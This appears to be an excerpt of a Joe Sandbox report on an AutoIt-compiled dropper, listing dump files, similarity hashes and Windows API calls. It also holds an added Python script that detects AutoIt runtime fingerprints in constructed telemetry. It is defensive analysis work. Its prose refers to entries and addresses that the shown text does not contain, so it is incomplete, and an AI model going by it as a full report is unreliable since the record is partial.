• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 3e1227118dec3ed44c7fb270f98697060c1377a6cd3f0f0baef7bf9a6a231e24
• Instruction ID: 1af51340daab00d4393716eb51fc208afac7a9517bac238fa556c5961b4519cb
• Opcode Fuzzy Hash: 3e1227118dec3ed44c7fb270f98697060c1377a6cd3f0f0baef7bf9a6a231e24
• Instruction Fuzzy Hash: CAD0A935388304BBE224A330BC0FFD22E549B50B10F100821B249BA0D0C8A068008680
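The three entries above are AutoIt runtime code rather than stealer logic: GetTempFileNameW with the prefix "aut" is how the AutoIt interpreter names the temporary files it unpacks (matching the "AutoIt$Error allocating memory." string in this dump), and the FindWindowW("Shell_TrayWnd") followed by PostMessageW(hwnd, 0x111, 0x197, 0) is a WM_COMMAND (0x111) sent to the Explorer taskbar window, as the AutoIt window-management built-ins do. Both are usable as host-side fingerprints for an AutoIt-compiled dropper. The script below is an added example, not part of the Joe Sandbox report or the AutoIt project: it correlates the two behaviours per process from telemetry. All event records are constructed for the example; their field names imitate a Sysmon FileCreate event and a generic API-call trace and are an assumption, not a real schema. The file-name pattern follows the documented GetTempFileNameW behaviour: prefix, then the 1..4 hex digits of the unique number Windows chooses when uUnique is 0, then ".tmp".

```python
"""Added example (not from the report): flag the AutoIt runtime fingerprints
listed above from host telemetry.  EVENTS is constructed; the field names
imitate Sysmon FileCreate plus an API-call trace and are an assumption."""
import re
from collections import defaultdict

# GetTempFileNameW(path, "aut", 0, out) yields <path>aut<hex>.tmp, where <hex>
# is the 1..4-digit hex unique number Windows picks when uUnique == 0.
AUTOIT_TMP_RE = re.compile(r"\\Temp\\aut[0-9A-F]{1,4}\.tmp$", re.IGNORECASE)
WM_COMMAND = 0x111      # message id in the PostMessageW call at 00E32DDB
TRAY_CMD_ID = 0x197     # wParam posted to Shell_TrayWnd in this sample

EVENTS = [  # constructed telemetry, not captured data
    {"type": "FileCreate", "pid": 4120, "image": r"C:\Users\u\Desktop\Setup.exe",
     "target": r"C:\Users\u\AppData\Local\Temp\aut1A2B.tmp"},
    {"type": "ApiCall", "pid": 4120, "api": "FindWindowW",
     "args": ["Shell_TrayWnd", None], "ret": 0x10012},
    {"type": "ApiCall", "pid": 4120, "api": "PostMessageW",
     "args": [0x10012, WM_COMMAND, TRAY_CMD_ID, 0], "ret": 1},
    # benign: a temp file with a different prefix and no taskbar message
    {"type": "FileCreate", "pid": 5516, "image": r"C:\Windows\System32\notepad.exe",
     "target": r"C:\Users\u\AppData\Local\Temp\tmpA1B2.tmp"},
    # half match: finds the tray window but posts WM_COMMAND to another hwnd
    {"type": "ApiCall", "pid": 6000, "api": "FindWindowW",
     "args": ["Shell_TrayWnd", None], "ret": 0x10012},
    {"type": "ApiCall", "pid": 6000, "api": "PostMessageW",
     "args": [0x20044, WM_COMMAND, TRAY_CMD_ID, 0], "ret": 1},
]

def autoit_indicators(events):
    """Return {pid: set(indicator)}:
    'autoit_tempfile'    - a file named aut<hex>.tmp created under ...\\Temp\\
    'traywnd_wm_command' - WM_COMMAND posted to the hwnd that FindWindowW
                           returned for class Shell_TrayWnd in the same process"""
    tray_hwnd = {}                  # pid -> hwnd FindWindowW returned for Shell_TrayWnd
    hits = defaultdict(set)
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "FileCreate" and AUTOIT_TMP_RE.search(ev["target"]):
            hits[pid].add("autoit_tempfile")
        elif ev["type"] == "ApiCall":
            if ev["api"] == "FindWindowW" and ev["args"][0] == "Shell_TrayWnd" and ev["ret"]:
                tray_hwnd[pid] = ev["ret"]
            elif (ev["api"] == "PostMessageW" and ev["args"][1] == WM_COMMAND
                  and ev["args"][0] == tray_hwnd.get(pid)):
                hits[pid].add("traywnd_wm_command")
    return dict(hits)

def autoit_suspects(events):
    """PIDs showing both fingerprints.  Either one alone is weak: benign
    AutoIt scripts produce the same temp-file names, and other software
    talks to Shell_TrayWnd too."""
    return sorted(pid for pid, inds in autoit_indicators(events).items()
                  if {"autoit_tempfile", "traywnd_wm_command"} <= inds)

if __name__ == "__main__":
    print(autoit_indicators(EVENTS))
    print(autoit_suspects(EVENTS))
```

Tying the PostMessageW hwnd back to the FindWindowW return value in the same process is what keeps the second indicator from firing on every WM_COMMAND in the trace; a real deployment would also want the image path and parent of the process, since the runtime behaviour is identical for legitimate AutoIt tools.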
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DDC213
• GetLastError.KERNEL32 ref: 00DDC221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DDC27C
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 50675d12932c0937e3cbcc0b8fc5c8161374cce11e4ca4535f3f138fd181450c
• Instruction ID: b4a990cccddef39794d1e04011502c2bf067d4b754e6062fba050b9a4a080eb8
• Opcode Fuzzy Hash: 50675d12932c0937e3cbcc0b8fc5c8161374cce11e4ca4535f3f138fd181450c
• Instruction Fuzzy Hash: 0141E730651207AFDB219FE5C844BBA7FA5EF11710F28516AF855A73A1EB308C01C7B4